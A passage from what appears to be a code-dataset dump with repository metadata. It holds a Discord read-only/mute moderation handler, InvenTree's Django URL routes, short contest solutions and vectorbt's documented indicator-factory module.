graph[key].append(b-1)
else:
for i, digit in enumerate(rep):
if digit == "1":
graph[i+1].append(b-1)
res = ["POSSIBLE"]
for i in range(b):
row = []
for j in range(b):
if j in graph[i]:
row.append(1)
else:
row.append(0)
res.append(''.join(str(x) for x in row))
return '\n'.join(res)
def construct(b):
d = {i:list(range(i+1,b-1)) for i in range(b) }
return d
n_cases = int(input())
for n_case in range(n_cases):
print("Case #{}: {}".format(n_case+1, solve()))
| [
"[email protected]"
] | |
36b479f0a4a7e4c24279afbf988d9396960305bd | 81a9840c702927b4ca9ef17b766064f1d3c9139d | /mantabot/apps/moderation/handlers/readonly.py | 212eafdce5f9d13f3499cb72f207fa73becc05d9 | [
"MIT"
] | permissive | spectras/mantabot | 58b2d996ccd359c7720006b87ab94db1ac07956f | 9b2de297d46224d66a84b8925e09cc209d8b37d4 | refs/heads/master | 2020-03-19T12:42:20.893443 | 2018-06-07T23:25:09 | 2018-06-07T23:25:09 | 136,534,522 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import discord
from mantabot.apps.moderation import service
class ReadOnly(object):
""" Simple plugin that deletes messages sent to some channels """
name = 'moderation.readonly'
def __init__(self, client):
self.client = client
async def on_message(self, message):
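        """Delete disallowed messages: anything in a read-only channel or from a muted member."""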
channel = message.channel
if not isinstance(channel, discord.abc.GuildChannel):
return
if message.author.bot:
return
# Handle readonly
if await service.get_readonly(channel):
try:
await message.delete()
except discord.NotFound:
pass # this is okay, message is already deleted
except discord.Forbidden:
await service.set_readonly(channel, False, user=channel.guild.me, reason='forbidden')
# Handle mutes
if await service.get_channel_member_muted(channel, message.author):
try:
await message.delete()
except (discord.NotFound, discord.Forbidden):
pass
| [
"[email protected]"
] | |
18426ac763d7a141d3556b448fb271532e0d54af | 3c3095585c075002b707475b49bdd8d8c7d4b71d | /InvenTree/InvenTree/urls.py | d9600333f4698fcd539486876a45dfd4ae42af04 | [
"MIT"
] | permissive | andyseracuse/InvenTree | ffa7c0a2d131b363c0b93c2d888a9a89c0048bf7 | c5166ec845ffe9477ab488931775dcdfd1dce7e7 | refs/heads/master | 2022-06-08T12:54:11.522718 | 2020-04-20T09:30:58 | 2020-04-20T09:30:58 | 258,296,796 | 0 | 0 | MIT | 2020-04-23T18:33:12 | 2020-04-23T18:33:11 | null | UTF-8 | Python | false | false | 4,211 | py | """
Top-level URL lookup for InvenTree application.
Passes URL lookup downstream to each app as required.
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views as auth_views
from qr_code import urls as qr_code_urls
from company.urls import company_urls
from company.urls import supplier_part_urls
from company.urls import price_break_urls
from common.urls import common_urls
from part.urls import part_urls
from stock.urls import stock_urls
from build.urls import build_urls
from order.urls import order_urls
from common.api import common_api_urls
from part.api import part_api_urls, bom_api_urls
from company.api import company_api_urls
from stock.api import stock_api_urls
from build.api import build_api_urls
from order.api import po_api_urls
from django.conf import settings
from django.conf.urls.static import static
from django.views.generic.base import RedirectView
from rest_framework.documentation import include_docs_urls
from .views import IndexView, SearchView, DatabaseStatsView
from .views import SettingsView, EditUserView, SetPasswordView
from .api import InfoView, BarcodePluginView, ActionPluginView
from users.urls import user_urls
admin.site.site_header = "InvenTree Admin"
apipatterns = [
url(r'^common/', include(common_api_urls)),
url(r'^part/', include(part_api_urls)),
url(r'^bom/', include(bom_api_urls)),
url(r'^company/', include(company_api_urls)),
url(r'^stock/', include(stock_api_urls)),
url(r'^build/', include(build_api_urls)),
url(r'^po/', include(po_api_urls)),
# User URLs
url(r'^user/', include(user_urls)),
# Plugin endpoints
url(r'^barcode/', BarcodePluginView.as_view(), name='api-barcode-plugin'),
url(r'^action/', ActionPluginView.as_view(), name='api-action-plugin'),
# InvenTree information endpoint
url(r'^$', InfoView.as_view(), name='api-inventree-info'),
]
settings_urls = [
url(r'^user/?', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings-user'),
url(r'^currency/?', SettingsView.as_view(template_name='InvenTree/settings/currency.html'), name='settings-currency'),
url(r'^part/?', SettingsView.as_view(template_name='InvenTree/settings/part.html'), name='settings-part'),
url(r'^other/?', SettingsView.as_view(template_name='InvenTree/settings/other.html'), name='settings-other'),
# Catch any other urls
url(r'^.*$', SettingsView.as_view(template_name='InvenTree/settings/user.html'), name='settings'),
]
urlpatterns = [
url(r'^part/', include(part_urls)),
url(r'^supplier-part/', include(supplier_part_urls)),
url(r'^price-break/', include(price_break_urls)),
url(r'^common/', include(common_urls)),
url(r'^stock/', include(stock_urls)),
url(r'^company/', include(company_urls)),
url(r'^order/', include(order_urls)),
url(r'^build/', include(build_urls)),
url(r'^auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^login/', auth_views.LoginView.as_view(), name='login'),
url(r'^logout/', auth_views.LogoutView.as_view(template_name='registration/logout.html'), name='logout'),
url(r'^settings/', include(settings_urls)),
url(r'^edit-user/', EditUserView.as_view(), name='edit-user'),
url(r'^set-password/', SetPasswordView.as_view(), name='set-password'),
url(r'^admin/', admin.site.urls, name='inventree-admin'),
url(r'^qr_code/', include(qr_code_urls, namespace='qr_code')),
url(r'^index/', IndexView.as_view(), name='index'),
url(r'^search/', SearchView.as_view(), name='search'),
url(r'^stats/', DatabaseStatsView.as_view(), name='stats'),
url(r'^api/', include(apipatterns)),
url(r'^api-doc/', include_docs_urls(title='InvenTree API')),
url(r'^markdownx/', include('markdownx.urls')),
]
# Static file access
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
# Media file access
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Send any unknown URLs to the parts page
urlpatterns += [url(r'^.*$', RedirectView.as_view(url='/index/', permanent=False), name='index')]
| [
"[email protected]"
] | |
e2a811d5af7d9c83a519a178aba99267740a9328 | 0b793bce2da8c3d09b7956c0672ddbffd46feaed | /atcoder/corp/ddcc2016_qa.py | 1c35c9661ac08bed450194c2318fc510b368dd9d | [
"MIT"
] | permissive | knuu/competitive-programming | c6c4e08fb231937d988bdc5a60a8ad6b31b97616 | 16bc68fdaedd6f96ae24310d697585ca8836ab6e | refs/heads/master | 2021-01-17T09:39:02.647688 | 2020-11-07T03:17:22 | 2020-11-07T03:17:22 | 27,886,732 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | A, B, C = map(int, input().split())
print('{:.20f}'.format(C * B / A))
| [
"[email protected]"
] | |
8fddcccf8a50a7b00db56be3a20a3f31347fac88 | 82d588161a8f8cd27c3031c779120ea4380791b9 | /yejin/삼성 SW 역량 테스트 기출 문제/2021 하반기/13458.py | 0e77a2dfcaf4b39f4e2dc3fcea152240ebab6c5f | [] | no_license | Yejin6911/Algorithm_Study | 3aa02a7d07169382a78c049d1de8251a52da816c | 98c968bfeed17ab6b62e3a077280e0310f08190a | refs/heads/master | 2023-09-01T00:31:07.212413 | 2021-10-24T07:56:21 | 2021-10-24T07:56:21 | 345,009,057 | 1 | 1 | null | 2021-09-20T13:08:33 | 2021-03-06T04:57:34 | Python | UTF-8 | Python | false | false | 343 | py | import sys
import math
input = sys.stdin.readline
n = int(input())
A = list(map(int, input().split()))
B, C = map(int, input().split())
total = n
# subtract the examinees covered by the chief supervisor (B per room)
for i in range(n):
if A[i] <= B:
A[i] = 0
else:
A[i] -= B
# 부감독관 인원 계산
total += math.ceil(A[i]/C)
print(total)
| [
"[email protected]"
] | |
53d2dffde18c9980be149e87a501fe5b3b978137 | e45efaf397712245b337d053a0fe2b388674e74d | /vectorbt/indicators/factory.py | 86266b73a949c1c2384a25d4b5828ceb362f5c90 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hiddenvs/vectorbt | 35efc95bf7c5cc6b84917c11c988c3e07ff3ed44 | 44968ac579a1420f713df326eb730bae93041622 | refs/heads/master | 2023-03-30T15:34:53.424776 | 2021-03-25T21:50:33 | 2021-03-25T21:50:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129,901 | py | """A factory for building new indicators with ease.
The indicator factory class `IndicatorFactory` offers a convenient way to create technical
indicators of any complexity. By providing it with information such as calculation functions and
the names of your inputs, parameters, and outputs, it will create a stand-alone indicator class
capable of running the indicator for an arbitrary combination of your inputs and parameters. It also
creates methods for signal generation and supports common pandas and parameter indexing operations.
Each indicator is basically a pipeline that:
* Accepts a list of input arrays (for example, OHLCV data)
* Accepts a list of parameter arrays (for example, window size)
* Accepts other relevant arguments and keyword arguments
* For each parameter combination, performs calculation on the input arrays
* Concatenates results into new output arrays (for example, rolling average)
This pipeline can be well standardized, which is done by `run_pipeline`.
`IndicatorFactory` simplifies the usage of `run_pipeline` by generating and pre-configuring
a new Python class with various class methods for running the indicator.
Each generated class includes the following features:
* Accepts input arrays of any compatible shape thanks to broadcasting
* Accepts output arrays written in-place instead of returning
* Accepts arbitrary parameter grids
* Supports caching and other optimizations out of the box
* Supports pandas and parameter indexing
* Offers helper methods for all inputs, outputs, and properties
Consider the following price DataFrame composed of two columns, one per asset:
```python-repl
>>> import vectorbt as vbt
>>> import numpy as np
>>> import pandas as pd
>>> from numba import njit
>>> from datetime import datetime
>>> price = pd.DataFrame({
... 'a': [1, 2, 3, 4, 5],
... 'b': [5, 4, 3, 2, 1]
... }, index=pd.Index([
... datetime(2020, 1, 1),
... datetime(2020, 1, 2),
... datetime(2020, 1, 3),
... datetime(2020, 1, 4),
... datetime(2020, 1, 5),
... ])).astype(float)
>>> price
a b
2020-01-01 1.0 5.0
2020-01-02 2.0 4.0
2020-01-03 3.0 3.0
2020-01-04 4.0 2.0
2020-01-05 5.0 1.0
```
For each column in the DataFrame, let's calculate a simple moving average and get its
crossover with price. In particular, we want to test two different window sizes: 2 and 3.
## Naive approach
A naive way of doing this:
```python-repl
>>> ma_df = pd.DataFrame.vbt.concat(
... price.rolling(window=2).mean(),
... price.rolling(window=3).mean(),
... keys=pd.Index([2, 3], name='ma_window'))
>>> ma_df
ma_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
>>> above_signals = (price.vbt.tile(2).vbt > ma_df)
>>> above_signals = above_signals.vbt.signals.first(after_false=True)
>>> above_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 True False False False
2020-01-03 False False True False
2020-01-04 False False False False
2020-01-05 False False False False
>>> below_signals = (price.vbt.tile(2).vbt < ma_df)
>>> below_signals = below_signals.vbt.signals.first(after_false=True)
>>> below_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 False True False False
2020-01-03 False False False True
2020-01-04 False False False False
2020-01-05 False False False False
```
Now the same using `IndicatorFactory`:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> myind = MyInd.run(price, [2, 3])
>>> above_signals = myind.price_above(myind.ma, crossover=True)
>>> below_signals = myind.price_below(myind.ma, crossover=True)
```
The `IndicatorFactory` class is used to construct indicator classes from UDFs. First, we provide
all the necessary information (the indicator config) to build the facade of the indicator, such as the names
of inputs, parameters, and outputs, and the actual calculation function. The factory then generates a
self-contained indicator class capable of running arbitrary configurations of inputs and parameters.
To run any configuration, we can either use the `run` method (as we did above) or the `run_combs` method.
## run and run_combs methods
The main method to run an indicator is `run`, which accepts arguments based on the config
provided to the `IndicatorFactory` (see the example above). These arguments include input arrays,
in-place output arrays, parameters, and arguments for `run_pipeline`.
The `run_combs` method takes the same inputs as the method above, but computes all combinations
of passed parameters based on a combinatorial function and returns multiple instances that
can be compared with each other. For example, this is useful to generate crossover signals
of multiple moving averages:
```python-repl
>>> myind1, myind2 = MyInd.run_combs(price, [2, 3, 4])
>>> myind1.ma
myind_1_window 2 3
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 1.5 4.5 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.5 1.5 4.0 2.0
>>> myind2.ma
myind_2_window 3 4
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN
2020-01-03 2.0 4.0 NaN NaN NaN NaN
2020-01-04 3.0 3.0 2.5 3.5 2.5 3.5
2020-01-05 4.0 2.0 3.5 2.5 3.5 2.5
>>> myind1.ma_above(myind2.ma, crossover=True)
myind_1_window 2 3
myind_2_window 3 4 4
a b a b a b
2020-01-01 False False False False False False
2020-01-02 False False False False False False
2020-01-03 True False False False False False
2020-01-04 False False True False True False
2020-01-05 False False False False False False
```
Its main advantage is that it doesn't need to re-compute each combination thanks to smart caching.
To get details on what arguments are accepted by any of the class methods, use `help`:
```python-repl
>>> help(MyInd.run)
Help on method run:
run(price, window, short_name='custom', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `Indicator` indicator.
* Inputs: `price`
* Parameters: `window`
* Outputs: `ma`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
## Parameters
`IndicatorFactory` allows definition of arbitrary parameter grids.
Parameters are variables that can hold one or more values. A single value can be passed as a
scalar, an array, or any other object. Multiple values are passed as a list or an array
(if the flag `is_array_like` is set to False for that parameter). If there are multiple parameters
and each is having multiple values, their values will broadcast to a single shape:
```plaintext
p1 p2 result
0 0 1 [(0, 1)]
1 [0, 1] [2] [(0, 2), (1, 2)]
2 [0, 1] [2, 3] [(0, 2), (1, 3)]
```
To illustrate the usage of parameters in indicators, let's build a basic indicator that returns 1
if the rolling mean is within upper and lower bounds, and -1 if it's outside:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window, price.shape[0]):
... mean = np.mean(price[i - window:i, col])
... output[i, col] = lower < mean < upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
```
By default, when `per_column` is set to False, each parameter is applied to the entire input.
One parameter combination:
```python-repl
>>> MyInd.run(
... price,
... window=2,
... lower=3,
... upper=5
... ).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Multiple parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=3,
... upper=5
... ).output
custom_window 2 3
custom_lower 3 3
custom_upper 5 5
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 0.0 1.0 NaN NaN
2020-01-04 0.0 1.0 0.0 1.0
2020-01-05 1.0 0.0 0.0 0.0
```
Product of parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... param_product=True
... ).output
custom_window 2 3
custom_lower 3 4 3 4
custom_upper 5 5 5 5
a b a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-03 0.0 1.0 0.0 1.0 NaN NaN NaN NaN
2020-01-04 0.0 1.0 0.0 0.0 0.0 1.0 0.0 0.0
2020-01-05 1.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
```
Multiple parameter combinations, one per column:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... per_column=True
... ).output
custom_window 2 3
custom_lower 3 4
custom_upper 5 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 NaN
2020-01-04 0.0 0.0
2020-01-05 1.0 0.0
```
Parameter defaults can be passed directly to the `IndicatorFactory.from_custom_func` and
`IndicatorFactory.from_apply_func`, and overridden in the run method:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, window=2, lower=3, upper=4)
>>> MyInd.run(price, upper=5).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Some parameters are meant to be defined per row, column, or element of the input.
By default, if we pass the parameter value as an array, the indicator will treat this array
as a list of multiple values - one per input. To make the indicator view this array as a single
value, set the flag `is_array_like` to True in `param_settings`. Also, to automatically broadcast
the passed scalar/array to the input shape, set `bc_to_input` to True, 0 (index axis), or 1 (column axis).
In our example, the parameter `window` can broadcast per column, and both parameters
`lower` and `upper` can broadcast per element:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window[col], price.shape[0]):
... mean = np.mean(price[i - window[col]:i, col])
... output[i, col] = lower[i, col] < mean < upper[i, col]
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=dict(is_array_like=True, bc_to_input=1, per_column=True),
... lower=dict(is_array_like=True, bc_to_input=True),
... upper=dict(is_array_like=True, bc_to_input=True)
... )
... )
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=np.array([1, 2]),
... upper=np.array([3, 4]),
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 0.0 1.0 NaN
2020-01-05 0.0 1.0 0.0 1.0
```
Broadcasting a huge number of parameters to the input shape can consume lots of memory,
especially when the array materializes. Luckily, vectorbt implements flexible broadcasting,
which preserves the original dimensions of the parameter. This requires two changes:
setting `keep_raw` to True in `broadcast_kwargs` and passing `flex_2d` to the apply function.
There are two configs in `vectorbt.indicators.configs` exactly for this purpose: one for column-wise
broadcasting and one for element-wise broadcasting:
```python-repl
>>> from vectorbt.base.reshape_fns import flex_select_auto_nb
>>> from vectorbt.indicators.configs import flex_col_param_config, flex_elem_param_config
>>> @njit
... def apply_func_nb(price, window, lower, upper, flex_2d):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... _window = flex_select_auto_nb(0, col, window, flex_2d)
... for i in range(_window, price.shape[0]):
... _lower = flex_select_auto_nb(i, col, lower, flex_2d)
... _upper = flex_select_auto_nb(i, col, upper, flex_2d)
... mean = np.mean(price[i - _window:i, col])
... output[i, col] = _lower < mean < _upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=flex_col_param_config,
... lower=flex_elem_param_config,
... upper=flex_elem_param_config
... ),
... pass_flex_2d=True
... )
```
Both bound parameters can now be passed as a scalar (value per whole input), a 1-dimensional
array (value per row or column, depending upon whether input is a Series or a DataFrame),
a 2-dimensional array (value per element), or a list of any of those. This allows for the
highest parameter flexibility at the lowest memory cost.
For example, let's build a grid of two parameter combinations, each being one window size per column
and both bounds per element:
```python-repl
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=price.values - 3,
... upper=price.values + 3,
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 1.0 1.0 NaN
2020-01-05 1.0 1.0 1.0 1.0
```
Indicators can also be parameterless. See `vectorbt.indicators.basic.OBV`.
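Below is a minimal sketch of such a parameterless indicator (using a plain Python apply
function for brevity):

```python-repl
>>> MyInd = vbt.IndicatorFactory(
...     input_names=['price'],
...     output_names=['output']
... ).from_apply_func(lambda price: price * 2)
>>> MyInd.run(price).output
               a     b
2020-01-01   2.0  10.0
2020-01-02   4.0   8.0
2020-01-03   6.0   6.0
2020-01-04   8.0   4.0
2020-01-05  10.0   2.0
```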
## Inputs
`IndicatorFactory` supports passing none, one, or multiple inputs. If multiple inputs are passed,
it tries to broadcast them into a single shape.
Remember that in vectorbt each column means a separate backtest instance. That's why in order to use
multiple pieces of information, such as open, high, low, close, and volume, we need to provide
them as separate pandas objects rather than a single DataFrame.
Let's create a parameterless indicator that measures the position of the close price within each bar:
```python-repl
>>> @njit
... def apply_func_nb(high, low, close):
... return (close - low) / (high - low)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['high', 'low', 'close'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price + 1, price - 1, price).output
a b
2020-01-01 0.5 0.5
2020-01-02 0.5 0.5
2020-01-03 0.5 0.5
2020-01-04 0.5 0.5
2020-01-05 0.5 0.5
```
To demonstrate broadcasting, let's pass high as a DataFrame, low as a Series, and close as a scalar:
```python-repl
>>> df = pd.DataFrame(np.random.uniform(1, 2, size=(5, 2)))
>>> sr = pd.Series(np.random.uniform(0, 1, size=5))
>>> MyInd.run(df, sr, 1).output
0 1
0 0.960680 0.666820
1 0.400646 0.528456
2 0.093467 0.134777
3 0.037210 0.102411
4 0.529012 0.652602
```
By default, if a Series was passed, it's automatically expanded into a 2-dimensional array.
To keep it as 1-dimensional, set `to_2d` to False.
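For example, a minimal sketch that keeps inputs one-dimensional, re-using `apply_func_nb`
and `sr` from above:

```python-repl
>>> MyInd1d = vbt.IndicatorFactory(
...     input_names=['high', 'low', 'close'],
...     output_names=['output']
... ).from_apply_func(apply_func_nb, to_2d=False)
>>> MyInd1d.run(sr + 1, sr - 1, sr).output.ndim
1
```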
Similar to parameters, we can also define defaults for inputs. In addition to using scalars
and arrays as default values, we can reference other inputs:
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, ts3):
... return ts1 + ts2 + ts3
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2', 'ts3'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, ts2='ts1', ts3='ts1')
>>> MyInd.run(price).output
a b
2020-01-01 3.0 15.0
2020-01-02 6.0 12.0
2020-01-03 9.0 9.0
2020-01-04 12.0 6.0
2020-01-05 15.0 3.0
>>> MyInd.run(price, ts2=price * 2).output
a b
2020-01-01 4.0 20.0
2020-01-02 8.0 16.0
2020-01-03 12.0 12.0
2020-01-04 16.0 8.0
2020-01-05 20.0 4.0
```
What if an indicator doesn't take any input arrays? In that case, we can force the user to
at least provide the input shape. Let's define a generator that emulates random returns and
generates synthetic price:
```python-repl
>>> @njit
... def apply_func_nb(input_shape, start, mu, sigma):
... rand_returns = np.random.normal(mu, sigma, input_shape)
... return start * vbt.nb.cumprod_nb(rand_returns + 1)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['start', 'mu', 'sigma'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... require_input_shape=True,
... seed=42
... )
>>> MyInd.run(price.shape, 100, 0, 0.01).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
0 100.496714 99.861736
1 101.147620 101.382660
2 100.910779 101.145285
3 102.504375 101.921510
4 102.023143 102.474495
```
We can also supply pandas meta such as `input_index` and `input_columns` to the run method:
```python-repl
>>> MyInd.run(
... price.shape, 100, 0, 0.01,
... input_index=price.index, input_columns=price.columns
... ).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
a b
2020-01-01 100.496714 99.861736
2020-01-02 101.147620 101.382660
2020-01-03 100.910779 101.145285
2020-01-04 102.504375 101.921510
2020-01-05 102.023143 102.474495
```
One can even build an input-less indicator that decides on the output shape dynamically:
```python-repl
>>> from vectorbt.base.combine_fns import apply_and_concat_one
>>> def apply_func(i, ps, input_shape):
... out = np.full(input_shape, 0)
... out[:ps[i]] = 1
... return out
>>> def custom_func(ps):
... input_shape = (np.max(ps),)
... return apply_and_concat_one(len(ps), apply_func, ps, input_shape)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['p'],
... output_names=['output']
... ).from_custom_func(custom_func)
>>> MyInd.run([1, 2, 3, 4, 5]).output
custom_p 1 2 3 4 5
0 1 1 1 1 1
1 0 1 1 1 1
2 0 0 1 1 1
3 0 0 0 1 1
4 0 0 0 0 1
```
## Outputs
There are two types of outputs: regular and in-place outputs:
* Regular outputs are one or more arrays returned by the function. Each must have the same
shape, and its number of columns must equal the number of input columns multiplied by the number of parameter values.
* In-place outputs are not returned but modified in-place. They broadcast together with inputs
and are passed to the calculation function as a list, one per parameter.
Two regular outputs:
```python-repl
>>> @njit
... def apply_func_nb(price):
... return price - 1, price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1', 'out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.out2, myind.price + 1)
```
One regular output and one in-place output:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out2):
... in_out2[:] = price + 1
... return price - 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1'],
... in_output_names=['in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
Two in-place outputs:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = price - 1
... in_out2[:] = price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.in_out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
By default, in-place outputs are created as empty arrays with uninitialized values.
This allows creation of optional outputs that, if not written, do not occupy much memory.
Since not all outputs are meant to be of data type `float`, we can pass `dtype` in the `in_output_settings`.
```python-repl
>>> @njit
... def apply_func_nb(price, in_out):
... in_out[:] = price > np.mean(price)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out']
... ).from_apply_func(
... apply_func_nb,
... in_output_settings=dict(in_out=dict(dtype=bool))
... )
>>> MyInd.run(price).in_out
a b
2020-01-01 False True
2020-01-02 False True
2020-01-03 False False
2020-01-04 True False
2020-01-05 True False
```
Another advantage of in-place outputs is that we can provide their initial state:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = in_out1 + price
... in_out2[:] = in_out2 + price
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(
... apply_func_nb,
... in_out1=100,
... in_out2='price'
... )
>>> myind = MyInd.run(price)
>>> myind.in_out1
a b
2020-01-01 101 105
2020-01-02 102 104
2020-01-03 103 103
2020-01-04 104 102
2020-01-05 105 101
>>> myind.in_out2
a b
2020-01-01 2.0 10.0
2020-01-02 4.0 8.0
2020-01-03 6.0 6.0
2020-01-04 8.0 4.0
2020-01-05 10.0 2.0
```
## Without Numba
It's also possible to supply a function that is not Numba-compiled. This is handy when working with
third-party libraries (see the implementation of `IndicatorFactory.from_talib`). Additionally,
we can set `keep_pd` to True to pass all inputs as pandas objects instead of raw NumPy arrays.
!!! note
Already broadcasted pandas meta will be provided; that is, each input array will have the
same index and columns.
Let's demonstrate this by wrapping a basic composed [pandas_ta](https://github.com/twopirllc/pandas-ta) strategy:
```python-repl
>>> import pandas_ta as ta
>>> def apply_func(open, high, low, close, volume, ema_len, linreg_len):
... df = pd.DataFrame(dict(open=open, high=high, low=low, close=close, volume=volume))
... df.ta.strategy(ta.Strategy("MyStrategy", [
... dict(kind='ema', length=ema_len),
... dict(kind='linreg', close='EMA_' + str(ema_len), length=linreg_len)
... ]))
... return tuple([df.iloc[:, i] for i in range(5, len(df.columns))])
>>> MyInd = vbt.IndicatorFactory(
... input_names=['open', 'high', 'low', 'close', 'volume'],
... param_names=['ema_len', 'linreg_len'],
... output_names=['ema', 'ema_linreg']
... ).from_apply_func(
... apply_func,
... keep_pd=True,
... to_2d=False
... )
>>> my_ind = MyInd.run(
... ohlcv['Open'],
... ohlcv['High'],
... ohlcv['Low'],
... ohlcv['Close'],
... ohlcv['Volume'],
... ema_len=5,
... linreg_len=[8, 9, 10]
... )
>>> my_ind.ema_linreg
custom_ema_len 5
custom_linreg_len 8 9 10
date
2021-02-02 NaN NaN NaN
2021-02-03 NaN NaN NaN
2021-02-04 NaN NaN NaN
2021-02-05 NaN NaN NaN
2021-02-06 NaN NaN NaN
... ... ... ...
2021-02-25 52309.302811 52602.005326 52899.576568
2021-02-26 50797.264793 51224.188381 51590.825690
2021-02-28 49217.904905 49589.546052 50066.206828
2021-03-01 48316.305403 48553.540713 48911.701664
2021-03-02 47984.395969 47956.885953 48150.929668
```
In the example above, only one Series per open, high, low, close, and volume can be passed.
To enable the indicator to process two-dimensional data, set `to_2d` to True and create a loop
over each column in the `apply_func`.
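A rough sketch of such a column loop, assuming a single EMA output for brevity (names
are illustrative):

```python-repl
>>> def apply_func(close, ema_len):
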